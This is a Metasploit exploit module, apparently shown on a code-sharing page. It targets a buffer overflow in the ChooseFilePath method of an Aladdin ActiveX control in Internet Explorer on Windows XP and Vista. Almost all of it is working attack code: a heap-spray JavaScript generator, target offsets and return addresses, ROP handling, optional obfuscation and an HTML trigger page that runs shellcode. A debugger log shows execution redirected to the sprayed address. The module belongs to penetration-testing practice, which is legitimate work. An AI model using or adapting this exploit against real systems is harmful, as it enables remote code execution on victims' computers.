Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::BrowserExploitServer
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'           => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",
14
      'Description'    => %q{
15
          This module exploits a vulnerability found in Aladdin Knowledge System's
16
        ActiveX component.  By supplying a long string of data to the ChooseFilePath()
17
        function, a buffer overflow occurs, which may result in remote code execution
18
        under the context of the user.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         =>
22
        [
23
          'shinnai',       #Vulnerability Discovery
24
          'b33f',          #Original exploit
25
          'sinn3r',        #Metasploit
26
          'juan vazquez'   #Metasploit, IE8 target
27
        ],
28
      'References'     =>
29
        [
30
          [ 'OSVDB', '86723' ],
31
          [ 'EDB',   '22258' ],
32
          [ 'EDB',   '22301' ]
33
        ],
34
      'Payload'        =>
35
        {
36
          'StackAdjustment' => -3500
37
        },
38
      'DefaultOptions'  =>
39
        {
40
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
41
        },
42
      'Platform'       => 'win',
43
      'BrowserRequirements' =>
44
        {
45
          :source => /script|headers/i,
46
          :activex => [
47
            {
48
              clsid: "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",
49
              method: "ChooseFilePath"
50
            }
51
          ],
52
          :os_name => OperatingSystems::Match::WINDOWS,
53
        },
54
      'Targets'        =>
55
        [
56
          [ 'Automatic', {} ],
57
          [
58
            'Windows XP with IE 6',
59
              {
60
                'os_name'   => OperatingSystems::Match::WINDOWS_XP,
61
                'ua_name'   => 'MSIE',
62
                'ua_ver'    => '6.0',
63
                'Rop'       => false,
64
                'Offset' => '0x5F4',
65
                'Ret' => 0x0c0c0c0c
66
              }
67
          ],
68
          [
69
            'Windows XP with IE 7',
70
              {
71
                'os_name'   => OperatingSystems::Match::WINDOWS_XP,
72
                'ua_name'   => 'MSIE',
73
                'ua_ver'    => '7.0',
74
                'Rop'       => false,
75
                'Offset' => '0x5F4',
76
                'Ret' => 0x0c0c0c0c
77
              }
78
          ],
79
          [
80
            'Windows XP with IE 8',
81
              {
82
                'os_name'   => OperatingSystems::Match::WINDOWS_XP,
83
                'ua_name'   => 'MSIE',
84
                'ua_ver'    => '8.0',
85
                'Rop'       => true,
86
                'Offset' => '0x5f6',
87
                'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll
88
              }
89
          ],
90
          [
91
            'Windows Vista with IE 7',
92
              {
93
                'os_name'   => OperatingSystems::Match::WINDOWS_VISTA,
94
                'ua_name'   => 'MSIE',
95
                'ua_ver'    => '7.0',
96
                'Rop'       => false,
97
                'Offset' => '0x5F4',
98
                'Ret' => 0x0c0c0c0c
99
              }
100
          ]
101

102
        ],
103
      'Privileged'     => false,
104
      'DisclosureDate' => '2012-04-01',
105
      'DefaultTarget'  => 0))
106

107
    register_options(
108
      [
109
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
110
      ], self.class
111
    )
112
  end
113

114

115
  def ie_heap_spray(p)
116
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
117
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(get_target.arch))
118
    randnop = rand_text_alpha(rand(100) + 1)
119

120
    # Land the payload at 0x0c0c0c0c
121

122
    js = %Q|
123
    var heap_obj = new heapLib.ie(0x20000);
124
    var code = unescape("#{js_code}");
125
    var #{randnop} = "#{js_nops}";
126
    var nops = unescape(#{randnop});
127
    while (nops.length < 0x80000) nops += nops;
128
    var offset = nops.substring(0, #{get_target['Offset']});
129
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
130
    while (shellcode.length < 0x40000) shellcode += shellcode;
131
    var block = shellcode.substring(0, (0x80000-6)/2);
132
    heap_obj.gc();
133
    for (var i=1; i < 0x300; i++) {
134
      heap_obj.alloc(block);
135
    }
136
    |
137

138
    js = heaplib(js, {:noobfu => true})
139

140
    if datastore['OBFUSCATE']
141
      js = ::Rex::Exploitation::JSObfu.new(js)
142
      js.obfuscate(memory_sensitive: true)
143
    end
144

145
    return js
146
  end
147

148
  def exploit_template(cli, target_info)
149

150
    if get_target['Rop']
151
      p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
152
    else
153
      p = get_payload(cli, target_info)
154
    end
155

156
    spray = ie_heap_spray(p)
157
    target_ret = Rex::Text.to_hex([get_target.ret].pack("V"))
158

159
    html_template = %Q|
160
    <html>
161
    <object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>
162
    <script>
163
    <%=spray%>
164
    junk='';
165
    for( counter=0; counter<=267; counter++) junk+=unescape("%0c");
166
    pwnd.ChooseFilePath(junk + "<%=target_ret%>");
167
    </script>
168
    </html>
169
    |
170

171
    return html_template, binding()
172
  end
173

174
  def on_request_exploit(cli, request, target_info)
175
    print_status("Sending HTML...")
176
    send_exploit_html(cli, exploit_template(cli, target_info))
177
  end
178
end
179

180
=begin
181
0:008> g
182
(82c.12dc): Access violation - code c0000005 (first chance)
183
First chance exceptions are reported before any exception handling.
184
This exception may be expected and handled.
185
eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8
186
eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0         nv up ei pl zr na pe nc
187
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
188
OLEAUT32!SysReAllocStringLen+0x31:
189
7712a41a 8b00            mov     eax,dword ptr [eax]  ds:0023:0c0c0c0c=????????
190
0:008> g
191
(82c.12dc): Access violation - code c0000005 (first chance)
192
First chance exceptions are reported before any exception handling.
193
This exception may be expected and handled.
194
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
195
eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0         nv up ei pl zr na pe nc
196
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
197
0c0c0c0c ??              ???
198
0:008> db 020bf798
199
020bf798  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
200
020bf7a8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
201
020bf7b8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
202
020bf7c8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
203
020bf7d8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
204
020bf7e8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
205
020bf7f8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
206
020bf808  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
207
=end
208

209